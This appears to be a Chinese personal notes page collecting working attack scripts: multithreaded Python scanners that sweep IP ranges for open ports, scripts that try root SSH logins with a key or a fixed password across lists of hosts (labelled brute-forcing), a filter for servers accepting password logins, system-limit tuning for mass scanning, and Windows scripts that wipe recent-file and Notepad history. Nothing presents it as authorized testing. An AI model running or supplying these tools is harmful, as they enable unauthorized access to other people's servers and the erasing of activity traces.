安装拓展

pip3 install --upgrade setuptools wheel -i https://mirrors.aliyun.com/pypi/simple
pip3 install setuptools-rust -i https://mirrors.aliyun.com/pypi/simple
pip3 install paramiko  -i https://mirrors.aliyun.com/pypi/simple

txt

@echo off
echo 正在清除最近打开的文本文件记录...

:: 清除"最近使用的项目"文件夹中的内容
del /q %APPDATA%\Microsoft\Windows\Recent\*.lnk
del /q %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\*.automaticDestinations-ms
del /q %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\*.customDestinations-ms

:: 清除记事本(Notepad)特定的最近文件列表
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Notepad\Recent File List" /f

:: 清除文件资源管理器的历史记录
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.txt" /f

:: 刷新资源管理器
taskkill /f /im explorer.exe
start explorer.exe

echo 清除完成!
echo 已删除最近打开的文本文件记录。
pause 

Powershell

# 清除最近的项目
Remove-Item "$env:APPDATA\Microsoft\Windows\Recent\*" -Force -Recurse

# 清除最近打开的文件列表
Remove-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\*" -Force -Recurse

# 清除记事本历史记录
Remove-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\Applets\Notepad\Recent File List" -Force -ErrorAction SilentlyContinue

# 重启资源管理器
Stop-Process -Name explorer
Start-Process explorer

1.python多线程查询

a.b.c.1-a.b.c.255是否开放80端口并且进行排序

import threading
import socket
from concurrent.futures import ThreadPoolExecutor

# 定义要扫描的IP地址范围和端口范围
start_ip = "a.b.c.1"
end_ip = "a.b.c.255"
start_port = 22
end_port = 22

# 定义一个函数用于检查端口是否开放
def scan_port(ip, port):
    try:
        # 创建套接字对象
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # 设置超时时间为1秒
        s.settimeout(1)
        # 尝试连接到目标IP的指定端口
        result = s.connect_ex((ip, port))
        # 如果端口开放,则输出结果
        if result == 0:
            print(f"{ip}:{port}")
        # 关闭套接字连接
        s.close()
    except:
        pass

# 定义一个函数用于扫描指定IP地址范围的端口
def scan_ip_range(ip_range):
    with ThreadPoolExecutor(max_workers=50) as executor:
        for ip in ip_range:
            for port in range(start_port, end_port + 1):
                executor.submit(scan_port, ip, port)

# 将IP地址范围转换为列表
def ip_range(start_ip, end_ip):
    start = list(map(int, start_ip.split(".")))
    end = list(map(int, end_ip.split(".")))
    temp = start
    ip_range = []

    ip_range.append(start_ip)
    while temp != end:
        start[3] += 1
        for i in (3, 2, 1):
            if temp[i] == 256:
                temp[i] = 0
                temp[i-1] += 1
        ip_range.append(".".join(map(str, temp)))
    return ip_range

# 执行端口扫描
ip_range_list = ip_range(start_ip, end_ip)
scan_ip_range(ip_range_list)

验证200

import threading
import requests

def check_status(ip):


    url = f"http://{ip}/ceshi"
    try:
        response = requests.get(url, timeout=1)
        if response.status_code == 200:
            print(f"IP {ip} 请求成功!")
    except requests.RequestException:
        pass  # 不输出连接失败的信息

def main():
    file_path = "/home/port.txt"
  
    with open(file_path, 'r') as file:
        ip_addresses = [line.strip() for line in file.readlines()]

    threads = []
    for ip in ip_addresses:
        thread = threading.Thread(target=check_status, args=(ip,))
        threads.append(thread)
        thread.start()

    for thread in threads:
        thread.join()

if __name__ == "__main__":
    main()

ssh密钥爆破

import paramiko

# 设置 SSH 密钥路径和用户名
private_key_path = '/root/.ssh/id_rsa'
username = 'root'

# 读取 port1.txt 文件中的 IP 和端口
with open('port1.txt', 'r') as f:
    lines = f.readlines()

# 初始化 SSH 客户端
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# 遍历每一行 IP 和端口
for line in lines:
    ip, port = line.strip().split(':')
    try:
        # 明确加载 RSA 密钥
        private_key = paramiko.RSAKey.from_private_key_file(private_key_path)
  
        # 尝试使用 SSH 连接
        client.connect(ip, port=int(port), username=username, pkey=private_key)
        print(f"Successfully connected to {ip}:{port}")
  
        # 一旦成功连接,立即断开并跳出循环
        client.close()
        break  # 如果连接成功,立刻停止后续操作
    except Exception as e:
        print(f"Failed to connect to {ip}:{port} - {e}")

ssh密码爆破

import paramiko

# 定义要连接的IP地址列表
ip_addresses = [
"1.1.1.1",
"1.1.1.1"
]

# 设置SSH连接的用户名和密码
username = "root"
password = "root"

# 尝试连接服务器
for ip in ip_addresses:
    print(f"尝试连接到 {ip}...")
    try:
        # 创建 SSH 客户端
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(ip, username=username, password=password)
        print(f"成功连接到 {ip}!")
        break  # 如果连接成功,则跳出循环
    except Exception as e:
        print(f"连接失败:{str(e)}")
    finally:
        client.close()  # 关闭 SSH 客户端连接

匹配

import requests
from urllib3.exceptions import InsecureRequestWarning
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
import threading

# 禁用 SSL 警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# 创建线程锁用于打印
print_lock = threading.Lock()

def test_url(region, url, ip, port):
    """测试单个URL的可访问性"""
    # 从原URL提取路径部分
    path = url.split('baidu.com/')[1]
    # 构建新的URL
    new_url = f'http://{ip}:{port}/{path}'
  
    try:
        response = requests.get(new_url, verify=False, timeout=5)
        status = response.status_code
        with print_lock:
            pass
    except Exception as e:
        status = 0
        with print_lock:
            pass
  
    return (ip, port, region, new_url, status)

# 读取 URL 列表
with open('url.txt', 'r', encoding='utf-8') as file:
    url_lines = [line.strip() for line in file.readlines()]

# 读取 IP 地址列表
with open('1.txt', 'r', encoding='utf-8') as file:
    ip_list = [line.strip() for line in file.readlines()]

# 打印总数信息
print(f"URL 总数:{len(url_lines)}")
print(f"IP 总数:{len(ip_list)}")
print(f"总组合数:{len(url_lines) * len(ip_list)}")

# 存储新的 URL 和 IP 信息的列表
url_ip_pairs = []

# 创建任务列表
tasks = []
for line in url_lines:
    region, url = line.split(' : ')
    # 对每个URL,尝试所有的IP
    for ip_port in ip_list:
        ip, port = ip_port.split(':')
        tasks.append((region, url, ip, port))

# 使用线程池执行任务
with ThreadPoolExecutor(max_workers=100) as executor:
    # 提交所有任务
    future_to_url = {executor.submit(test_url, region, url, ip, port): (region, url) 
                    for region, url, ip, port in tasks}
  
    # 收集结果
    for future in as_completed(future_to_url):
        result = future.result()
        url_ip_pairs.append(result)

# 按 IP 地址和端口号排序
url_ip_pairs.sort(key=lambda x: (tuple(map(int, x[0].split('.'))), int(x[1])))

# 将排序后的 URL 写入 cg.txt 文件,只写入状态码为 200 的URL
with open('cg.txt', 'w', encoding='utf-8') as file:
    success_count = 0
    for ip, port, region, new_url, status in url_ip_pairs:
        if status == 200:
            file.write(f'{region} : {new_url}\n')
            success_count += 1

print(f"\n总结:")
print(f"总计测试:{len(url_ip_pairs)} 个")
print(f"成功访问(状态码200):{success_count} 个")

需要修改系统限制

# 查看系统限制
ulimit -a

/etc/security/limits.conf 

ulimit -n
* soft nofile 655350
* hard nofile 655350

# 查看当前进程数
ps -eLf | wc -l

# 查看系统允许的最大线程数
cat /proc/sys/kernel/threads-max

# 查看单个进程允许的最大线程数
cat /proc/sys/kernel/pid_max

优化过的

查看开放的端口

import threading
import socket
import queue
import time
import sys
import os

# 重定向错误输出到 /dev/null
sys.stderr = open(os.devnull, 'w')

# 定义要扫描的IP地址范围和端口范围
start_ip = "1.1.1.1"
end_ip = "1.1.1.255"
start_port = 1
end_port = 1

# 自定义线程数
THREAD_COUNT = 2000

# 创建任务队列和结果列表
task_queue = queue.Queue()
successful_connections = 0
connection_lock = threading.Lock()
# 创建结果列表用于存储成功的连接
results = []
results_lock = threading.Lock()

def scan_port():
    global successful_connections
    while True:
        try:
            # 从队列获取任务
            try:
                ip, port = task_queue.get_nowait()  # 使用 get_nowait() 替代 get(timeout=1)
            except queue.Empty:
                return

            # 创建套接字对象
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(3)  # 减少超时时间到0.5秒
  
            # 尝试连接
            if s.connect_ex((ip, port)) == 0:
                with connection_lock:
                    successful_connections += 1
                with results_lock:
                    results.append(f"{ip}:{port}")
                print(f"{ip}:{port}")
  
            s.close()
            task_queue.task_done()
  
        except Exception:
            try:
                task_queue.task_done()
            except:
                pass

def ip_range(start_ip, end_ip):
    start = list(map(int, start_ip.split(".")))
    end = list(map(int, end_ip.split(".")))
    temp = start.copy()  # 使用 copy() 避免修改原始列表
    ip_range = []

    ip_range.append(start_ip)
    while temp != end:
        temp[3] += 1  # 修改 temp 而不是 start
        for i in (3, 2, 1):
            if temp[i] == 256:
                temp[i] = 0
                temp[i-1] += 1
        ip_range.append(".".join(map(str, temp)))
    return ip_range

def print_status(total_tasks):
    remaining = task_queue.qsize()
    completed = total_tasks - remaining
    if completed > 0 and total_tasks > 0:
        print(f"\r进度: {completed}/{total_tasks} ({completed/total_tasks*100:.1f}%) 发现开放端口: {successful_connections}", end='', flush=True)

def main():
    # 获取IP范围列表
    ip_range_list = ip_range(start_ip, end_ip)
    total_tasks = len(ip_range_list) * (end_port - start_port + 1)
  
    print(f"总任务数: {total_tasks}")
    print(f"使用线程数: {THREAD_COUNT}")
  
    # 将所有任务加入队列
    for port in range(start_port, end_port + 1):  # 先遍历端口
        for ip in ip_range_list:  # 再遍历IP
            task_queue.put((ip, port))

    # 创建并启动线程
    threads = []
    for _ in range(THREAD_COUNT):
        t = threading.Thread(target=scan_port)
        t.daemon = True
        t.start()
        threads.append(t)

    # 显示进度
    try:
        while task_queue.qsize() > 0:
            print_status(total_tasks)
            time.sleep(0.1)  # 减少刷新间隔
    except KeyboardInterrupt:
        print("\n扫描被用户中断")
        return

    # 等待所有任务完成
    task_queue.join()
    print("\n扫描完成")
  
    # 将结果保存到文件
    if results:  # 只有在有结果时才创建文件
        with open('c1.txt', 'w') as f:
            for result in sorted(results, key=lambda x: (tuple(map(int, x.split(':')[0].split('.'))), int(x.split(':')[1]))):
                f.write(result + '\n')
        print(f"发现 {len(results)} 个开放端口,结果已保存到 c1.txt")
    else:
        print("未发现开放端口")

if __name__ == "__main__":
    start_time = time.time()
    main()
    print(f"总耗时: {time.time() - start_time:.2f}秒")

ssh筛选

import paramiko
import socket
import threading
import queue
import time
import sys
import os

# 重定向标准错误输出到 /dev/null
sys.stderr = open(os.devnull, 'w')

# 禁用 paramiko 的警告信息
import warnings
warnings.filterwarnings(action='ignore',module='.*paramiko.*')

# 从文件读取IP:端口列表
with open('c1.txt', 'r') as f:
    targets = [line.strip() for line in f.readlines()]

# 创建任务队列和结果列表
task_queue = queue.Queue()
password_auth = []  # 支持密码登录的服务器
results_lock = threading.Lock()

# 线程数
THREAD_COUNT = 100

def check_ssh_auth(ip, port):
    try:
        transport = paramiko.Transport((ip, int(port)))
        transport.start_client()

        # 尝试获取可用的认证方法
        try:
            transport.auth_none('test')
        except paramiko.BadAuthenticationType as err:
            # 获取服务器支持的认证方法
            allowed_types = err.allowed_types
            if 'password' in allowed_types:
                with results_lock:
                    password_auth.append(f"{ip}:{port}")
                    print(f"发现支持密码登录的服务器: {ip}:{port}")
    except:
        pass
    finally:
        try:
            transport.close()
        except:
            pass

def worker():
    while True:
        try:
            target = task_queue.get_nowait()
            if target is None:
                break
            ip, port = target.split(':')
            check_ssh_auth(ip, port)
            task_queue.task_done()
        except queue.Empty:
            break
        except:
            pass

def main():
    print(f"开始检测 {len(targets)} 个目标...")
  
    # 将目标添加到队列
    for target in targets:
        task_queue.put(target)
  
    # 创建并启动线程
    threads = []
    for _ in range(THREAD_COUNT):
        t = threading.Thread(target=worker)
        t.daemon = True
        t.start()
        threads.append(t)

    # 显示进度
    total = len(targets)
    while task_queue.qsize() > 0:
        remaining = task_queue.qsize()
        completed = total - remaining
        print(f"\r进度: {completed}/{total} ({completed/total*100:.1f}%) "
              f"发现支持密码登录: {len(password_auth)}", 
              end='', flush=True)
        time.sleep(0.1)

    # 等待所有任务完成
    task_queue.join()
    print("\n检测完成")

    # 显示最终结果
    if password_auth:
        print(f"\n发现 {len(password_auth)} 个支持密码登录的服务器:")
        for result in sorted(password_auth, key=lambda x: tuple(map(int, x.split(':')[0].split('.') + [x.split(':')[1]]))):
            print(result)
    else:
        print("未发现支持密码登录的服务器")

if __name__ == "__main__":
    start_time = time.time()
    main()
    print(f"总耗时: {time.time() - start_time:.2f}秒") 
最后修改:2025 年 04 月 19 日
如果觉得我的文章对你有用,请随意赞赏